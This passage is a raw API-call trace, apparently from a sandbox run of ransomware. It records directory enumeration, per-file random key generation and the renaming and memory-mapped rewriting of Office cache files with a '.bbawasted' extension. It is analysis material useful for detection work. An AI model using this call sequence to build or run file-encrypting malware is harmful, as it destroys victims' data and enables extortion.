WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.814] lstrlenW (lpString="Chrysanthemum.jpg") returned 17 [0068.815] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.815] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.815] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0068.815] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.815] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.815] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0068.815] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.815] lstrlenW (lpString="Recorded TV") returned 11 [0068.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.816] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.816] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.816] lstrlenW (lpString="desktop.ini") returned 11 [0068.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.816] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.816] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.817] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.817] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.817] lstrlenW (lpString="desktop.ini") returned 11 [0068.817] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.817] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.817] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0068.817] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.817] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.817] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 1 [0068.817] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.817] lstrlenW (lpString="Videos") returned 6 [0068.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.817] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.817] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.817] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.817] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.817] lstrlenW (lpString="desktop.ini") returned 11 [0068.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.818] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.818] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.818] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5db068 | out: lpFindFileData=0x5db068*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x1d2dd9c, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.818] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.818] lstrlenW (lpString="desktop.ini") returned 11 [0068.818] FindClose (in: hFindFile=0x5c8cc8 | out: hFindFile=0x5c8cc8) returned 1 [0068.818] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.818] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0068.818] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.818] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.818] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 0 [0068.818] FindClose (in: hFindFile=0x5c8c48 | out: hFindFile=0x5c8c48) returned 1 [0068.818] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0068.818] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xfb5199ba, cFileName="Public", cAlternateFileName="")) returned 0 [0068.818] FindClose (in: hFindFile=0x5c04d8 | out: hFindFile=0x5c04d8) returned 1 [0068.818] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x580000) returned 1 [0068.818] FindNextFileW (in: hFindFile=0x5a47e0, lpFindFileData=0x5a5008 | out: lpFindFileData=0x5a5008*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Windows", cAlternateFileName="")) returned 1 [0068.818] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.819] lstrlenW (lpString="Windows") returned 7 [0068.819] FindClose (in: hFindFile=0x5a47e0 | out: hFindFile=0x5a47e0) returned 1 [0068.819] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5008 | out: hHeap=0x580000) returned 1 [0068.819] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b5bc8 | out: hHeap=0x580000) returned 1 [0068.819] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5bc0 | out: hHeap=0x580000) returned 1 [0068.819] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0068.820] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0068.820] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.820] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0068.820] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c0) returned 0x5a5008 [0068.820] lstrcpyW (in: lpString1=0x5a50be, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.820] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0068.820] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0068.820] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0068.821] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.821] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0068.821] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0068.822] SetEndOfFile (hFile=0xf8) returned 1 [0068.822] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.822] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.822] lstrcpyW (in: lpString1=0x5a50be, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted")) returned 1 [0068.876] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0068.876] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0068.877] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xaec3a [0068.877] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x11a0000 [0068.877] CloseHandle (hObject=0x100) returned 1 [0068.904] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0068.905] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0068.905] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.905] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0068.906] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0068.906] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.959] SetEndOfFile (hFile=0xf8) returned 1 [0068.961] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0068.961] CloseHandle (hObject=0xf8) returned 1 [0068.962] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5008 | out: hHeap=0x580000) returned 1 [0068.962] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bad98 | out: hHeap=0x580000) returned 1 [0068.962] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0068.963] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0068.963] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.963] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0068.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5a5008 [0068.963] lstrcpyW (in: lpString1=0x5a50a0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0068.963] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0068.964] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0068.964] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.964] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.008] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.009] SetEndOfFile (hFile=0xf8) returned 1 [0069.009] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.009] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.009] lstrcpyW (in: lpString1=0x5a50a0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0069.010] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.010] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.010] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x5061 [0069.010] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5061) returned 0x570000 [0069.010] CloseHandle (hObject=0x120) returned 1 [0069.013] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.014] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.014] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.014] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.014] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.014] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.023] SetEndOfFile (hFile=0xf8) returned 1 [0069.025] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.025] CloseHandle (hObject=0xf8) returned 1 [0069.026] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5008 | out: hHeap=0x580000) returned 1 [0069.026] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be948 | out: hHeap=0x580000) returned 1 [0069.026] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.027] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.027] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.027] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0069.027] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5a5008 [0069.028] lstrcpyW (in: lpString1=0x5a50a6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.028] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.028] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.028] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.028] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.028] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.bbawasted_info" 